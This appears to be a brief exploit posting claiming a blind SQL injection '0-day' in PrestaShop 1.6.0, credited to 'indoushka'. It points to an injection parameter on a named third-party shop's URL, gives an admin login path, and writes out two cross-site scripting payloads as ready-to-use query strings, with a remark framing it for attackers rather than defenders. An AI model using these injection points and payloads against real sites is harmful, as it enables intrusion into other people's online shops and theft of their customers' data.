PrestaShop V1.6.0 Blind Sql Vulnerability 0-Day
===============================================
Author : indoushka
vendor : http://www.prestashop.com/fr/telechargement
Dork : No 4 noob
http://swift-strike.com/ajax/getSimilarManufacturer.php?id_manufacturer=3 (inject her)
Login :
path/admin
Cross site scripting :
/index.php?controller=search&tag=bat_213771818860'():;771818860
/index.php?controller=search&orderby=position&orderway=desc&search_query=e'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>&submit_search=Search
Polish
English